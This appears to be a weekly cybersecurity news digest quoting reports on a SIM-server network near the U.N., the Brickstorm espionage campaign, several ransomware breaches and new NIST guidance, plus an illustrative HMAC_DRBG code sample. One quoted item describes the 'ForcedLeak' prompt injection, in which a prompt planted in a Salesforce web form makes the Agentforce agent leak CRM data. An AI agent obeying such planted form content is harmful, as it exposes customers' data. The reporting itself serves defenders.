    • “The range of threats included enabling encrypted communications between threat groups and criminals or disabling cell towers and conducting denial-of-service attacks to shut down cell communications in the region. Matt McCool, special agent in charge of the Secret Service’s New York field office, said the agency’s early analysis of the network indicated “cellular communications between foreign actors and individuals that are known to federal law enforcement.”
    • “In all, the agency said it discovered more than 300 servers and 100,000 SIM cards spread across multiple sites within 35 miles of the U.N. meeting. The Secret Service announcement came the same day President Donald Trump was scheduled to deliver a speech to the General Assembly.
    • “The potential for disruption to our country’s telecommunications posed by this network of devices cannot be overstated,” U.S. Secret Service Director Sean Curran said in a news release.”
  • Cyberscoop warns,
    • “Ambitious, suspected Chinese hackers with a slew of goals — stealing intellectual property, mining intelligence on national security and trade, developing avenues for future advanced cyberattacks — have been setting up shop inside U.S. target networks for exceptionally long stretches of time, in a breach that the researchers who uncovered it said could present problems for years to come.
    • “Mandiant and Google Threat Intelligence Group (GTIG) researchers described the campaign as exceptionally sophisticated, stealthy and complex, calling those behind it a “next-level threat.” But they don’t yet have a full handle on who the hackers are behind the malware they’ve dubbed Brickstorm, or how far it stretches. A blog post the company posted Wednesday sheds light on the group.
    • “The primary targets are legal services organizations and tech companies that provide security services, the researchers said. But the hackers aren’t limiting their interest to the primary targets, since they’ve used that access to infiltrate “downstream” customers. The researchers declined to describe those downstream customers or say whether U.S. federal agencies are among those targeted. A great many of them don’t know yet that they’re victims, they said.
    • “By stealing intellectual property from security-as-a-service (SaaS) firms, the hackers aim to find future zero-day vulnerabilities, a kind of vulnerability that is previously unknown and unpatched and thus highly prized, in order to enable more attacks down the line, the researchers from Mandiant and its parent company Google said.”
  • Per Dark Reading,
    • “Salesforce Web forms can be manipulated by the company’s “Agentforce” autonomous agent into exfiltrating customer relationship management (CRM) data — a concerning development as legacy software-as-a-service (SaaS) providers race to integrate agentic AI into their platforms to zhuzh up the user experience and generate buzz among investors.
    • “Agentforce is an agentic AI platform built into the Salesforce ecosystem, which allows users to spin up autonomous agents for most conceivable tasks. As the story often goes though, the autonomous technology appears to be the victim of the complexity of AI prompt training, according to researchers at Noma Security. 
    • “To wit: The researchers have identified a critical vulnerability chain in Agentforce, carrying a 9.4 out of 10 score on the CVSS vulnerability-severity scale. In essence it’s a cross-site scripting (XSS) play for the AI era — an attacker plants a malicious prompt into an online form, and when an agent later processes it, it leaks internal data. In keeping with all of the other prompt injection proofs-of-concept (PoCs) coming out these days, Noma has named its trick “ForcedLeak.”

From the ransomware front,

  • Cybersecurity Dive reports,
    • “RTX Corp., the parent firm of Collins Aerospace, confirmed that ransomware was used in the hack of its airline passenger processing software, in a filing with federal regulators.
    • “The attack, discovered on Sept. 19, has disrupted flights across Europe since last week, including at London’s Heathrow Airport, Brussels Airport, and airports in Berlin and Dublin. 
    • “The Multi-User System Environment software, known as MUSE, is used by multiple airlines to check-in and board passengers and is also used to track baggage, according to the filing with the U.S. Securities and Exchange Commission. 
    • “Virginia-based RTX said the MUSE system operates on a customer-specific network outside of the company’s enterprise network.
    • “U.K. authorities said Wednesday that a man in his 40s had been arrested on suspicion of violating the Computer Misuse Act. The police investigation is ongoing.” 
  • Dark Reading points out,
    • “Volvo Group North America (Volvo NA) has been breached via a third-party human resources (HR) software provider.
    • “At the root of the story is Miljödata, a Swedish company specializing in occupational software-as-a-service (SaaS), whose cloud infrastructure was breached in August. Thanks to its centralized, multi-tenant arrangement, hundreds of customers and millions of individuals have been affected. In a recent letter to its staff, Volvo NA, whose parent company is based in Sweden, revealed itself to be one such victim.
    • “Like other Miljödata customers, Volvo NA’s systems were untouched by the attack. Still, its employees’ names and Social Security numbers (SSNs) were stolen, and potentially published to the Dark Web. According to its website, Volvo NA employs just shy of 20,000 people.
    • “For municipalities, universities, and even big corporations like Volvo, this isn’t just a security issue, it’s an integrity issue,” says Anders Askasen, vice president of product marketing at Radiant Logic. “People suddenly wonder whether the systems handling their most sensitive data are fit for the purpose, and with good reason. That loss of confidence is as damaging as the leak itself.”
  • Industrial Cyber tells us,
    • “The Rhysida ransomware gang claimed responsibility for a late-August data breach at the Maryland Transit Administration. Exposed data includes names, surnames, dates of birth, driver’s licenses, SSNs, passports, and confidential information.
    • “The group is said to have demanded a ransom of 30 bitcoin, around US $3.4 million at the time of writing, to be paid within seven days. To support its claim, Rhysida posted images of documents allegedly stolen from the MTA, including scans of a Social Security card, driver’s license, passport, and several other records.
    • “Comparitech identified that to prove its claim, Rhysida posted images of what it says are documents stolen from the MTA. They include scans of a Social Security card, driver’s license, passport, and several other documents. 
    • “The Maryland Transit Administration is a division of the state’s Department of Transportation. It operates buses, light rail, subways, commuter trains, taxis, and a paratransit system. The MTA specifically mentioned the paratransit system, MobilityLink, being disrupted by the cyber attack.”
  • Per the Record,
    • “Ransomware hackers stole Social Security numbers, financial information and more during a recent cyberattack on Union County in Ohio. 
    • “The county government began sending out breach notifications to 45,487 local residents and county employees this week. The letters say ransomware was detected on the county’s network on May 18, prompting officials to hire cybersecurity experts and notify federal law enforcement agencies.  
    • “The hackers stole documents that had names, Social Security numbers, driver’s license numbers, financial account information, fingerprint data, medical information, passport numbers and more.  
    • “No ransomware gang has taken credit for the attack publicly, and the letters said the county has been monitoring internet sources but have not found any indication the stolen information was released or offered for sale.  
    • “The county has about 71,000 residents and is 45 minutes outside of Columbus — which dealt with its own ransomware attack one year ago.” 
  • HIPAA Journal lets us know,
    • “There’s good and bad news on the ransomware front. Attacks are down year-over-year; however, successful attacks are proving even costlier to mitigate, according to the Mid-Year Risk Report from the cyber risk management company Resilience. The company saw a 53% reduction in cyber insurance claims in the first half of the year, which indicates organizations are getting better at preventing attacks; however, when ransomware attacks succeed, they have been causing increased financial harm, with losses up 17% year-over-year. While ransomware accounted for just 9.6% of claims in H1 2025, ransomware attacks accounted for 91% of incurred losses.
    • “On average, a successful ransomware attack causes $1.18 million in damages, up from $1.01 million in 2024, and the cost is even higher in healthcare. Resilience’s healthcare clients suffered average losses of $1.3 million in 2024, and in the first half of 2025, some healthcare providers faced extortion demands as high as $4 million. While it is too early to tell what the severity of claims will be in 2025 until claims are settled, Resilience said there are indications that the average severity of incurred losses for healthcare ransomware attacks this year could be $2 million, up from an average of $705,000 in 2024 and $1.6 million in 2023.”

From the cybersecurity defenses front,

  • Cyberscoop advises,
    • “Artificial intelligence is no longer a future concept; it is being integrated into critical infrastructure, enterprise operations and security missions around the world. As we embrace AI’s potential and accelerate its innovation, we must also confront a new reality: the speed of cybersecurity conflict now exceeds human capacity. The timescale for effective threat response has compressed from months or days to mere seconds. 
    • “This acceleration requires removing humans from the tactical security loop. To manage this profound shift responsibly, we must evolve our thinking from abstract debates on “AI safety” to the practical, architectural challenge of “AI security.” The only way to harness the power of probabilistic AI is to ground it with deterministic controls.”
  • A Dark Reading commentator recommends that “With the emergence of AI-driven attacks and quantum computing, and the explosion of hyperconnected devices, zero trust remains a core strategy for security operations.”
  • Per a CISA news release,
    • “In today’s increasingly interconnected industrial landscape, operational technology (OT) systems are no longer isolated islands of automation—they’re deeply entwined with information technology and business networks, making them prime targets for cyber threats. Recognizing this growing risk, the Cybersecurity and Infrastructure Security Agency (CISA) collaborated with three U.S. federal agencies and five international partners and received contributions from twelve private sector stakeholders to develop and publish, “Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators”.
    • “This key resource helps owners and operators of OT systems create stronger, more secure infrastructures by building a clear inventory and classification of their assets. By identifying, organizing, and managing OT assets effectively, organizations can not only improve cybersecurity but also enhance operational reliability, safety, and resilience.”
  • Per National Institute of Standards news releases,
    • “NIST has released Special Publication (SP) 800-88r2 (Revision 2), Guidelines for Media Sanitization.
    • “Media sanitization is a process that renders access to the target data on media infeasible for a given level of effort. This guide will assist organizations and system owners in setting up a media sanitization program with proper and applicable methods and controls for sanitization and disposal based on the sensitivity of their information.”
  • and
    • “NIST has released Special Publication (SP) 800-90C, Recommendation for Random Bit Generator (RBG) Constructions. It is the final document in the SP 800-90 series, which supports the generation of high-quality random bits for cryptographic and non-cryptographic use.
    • “SP 800-90C specifies constructions for implementing random bit generators (RBGs) that include deterministic random bit generator (DRBG) mechanisms as specified in SP 800-90A and use entropy sources as specified in SP 800-90B.”
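As an added illustration of the layering the release describes (an SP 800-90B-style entropy source seeding an SP 800-90A DRBG mechanism, with periodic reseeding), here is an HMAC_DRBG with SHA-256 in Python. This is example code written for this digest, not NIST's; it assumes os.urandom as a stand-in entropy source rather than a validated SP 800-90B source, and a constructed fixed-seed source that exists only to show that the output is a deterministic function of the seed material.

```python
"""HMAC_DRBG (SP 800-90A, SHA-256) fed by a pluggable entropy source.

Added illustration of the SP 800-90C layering: an entropy source (the
SP 800-90B role) seeds a DRBG mechanism (the SP 800-90A role), and the
DRBG pulls fresh entropy again once its reseed interval is exhausted.
Not NIST's code. The entropy source used here is os.urandom, which is
not a validated SP 800-90B source; the fixed seed below is a constructed
test value and must never be used outside a demonstration.
"""
import hashlib
import hmac
import os
from typing import Callable

OUTLEN = 32               # SHA-256 output length in bytes
SECURITY_STRENGTH = 32    # 256-bit strength: entropy bytes requested per (re)seed
MAX_REQUEST_BYTES = 1 << 16  # SP 800-90A: at most 2^19 bits per generate call


def os_entropy(nbytes: int) -> bytes:
    """Stand-in entropy source; a deployment would use a validated 90B source."""
    return os.urandom(nbytes)


def fixed_source(seed: bytes) -> Callable[[int], bytes]:
    """Deterministic stand-in 'entropy source' for demonstration only.

    It stretches a constructed seed with SHA-256 so two DRBG instances built
    from the same seed can be shown to produce identical output streams.
    """
    def source(nbytes: int) -> bytes:
        return hashlib.sha256(seed).digest()[:nbytes]
    return source


class HmacDrbg:
    def __init__(self, entropy_source: Callable[[int], bytes], nonce: bytes = b"",
                 personalization: bytes = b"", reseed_interval: int = 10_000):
        self.entropy_source = entropy_source
        self.reseed_interval = reseed_interval
        # Instantiate (SP 800-90A 10.1.2.3): K = 0x00..00, V = 0x01..01,
        # then fold in seed_material = entropy_input || nonce || personalization.
        self.key = b"\x00" * OUTLEN
        self.v = b"\x01" * OUTLEN
        self._update(entropy_source(SECURITY_STRENGTH) + nonce + personalization)
        self.reseed_counter = 1

    def _hmac(self, data: bytes) -> bytes:
        return hmac.new(self.key, data, hashlib.sha256).digest()

    def _update(self, provided: bytes) -> None:
        """HMAC_DRBG_Update (SP 800-90A 10.1.2.2)."""
        self.key = self._hmac(self.v + b"\x00" + provided)
        self.v = self._hmac(self.v)
        if provided:
            self.key = self._hmac(self.v + b"\x01" + provided)
            self.v = self._hmac(self.v)

    def reseed(self, additional_input: bytes = b"") -> None:
        """Pull fresh entropy from the source and mix it into the state."""
        self._update(self.entropy_source(SECURITY_STRENGTH) + additional_input)
        self.reseed_counter = 1

    def generate(self, nbytes: int, additional_input: bytes = b"") -> bytes:
        """HMAC_DRBG_Generate (SP 800-90A 10.1.2.5) with automatic reseeding."""
        if nbytes > MAX_REQUEST_BYTES:
            raise ValueError("request exceeds max_number_of_bits_per_request")
        # Once the interval is exhausted, go back to the entropy source first.
        if self.reseed_counter > self.reseed_interval:
            self.reseed(additional_input)
            additional_input = b""
        if additional_input:
            self._update(additional_input)
        out = b""
        while len(out) < nbytes:
            self.v = self._hmac(self.v)
            out += self.v
        self._update(additional_input)
        self.reseed_counter += 1
        return out[:nbytes]


if __name__ == "__main__":
    # Live generator backed by the stand-in OS entropy source.
    rng = HmacDrbg(os_entropy, nonce=b"demo-nonce", personalization=b"cyber-saturday")
    print(rng.generate(32).hex())
    # Two instances from the same constructed seed yield the same stream.
    a = HmacDrbg(fixed_source(b"constructed-test-seed"), nonce=b"n")
    b = HmacDrbg(fixed_source(b"constructed-test-seed"), nonce=b"n")
    print(a.generate(16).hex() == b.generate(16).hex())
```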
  • Here is a link to Dark Reading’s CISO Corner.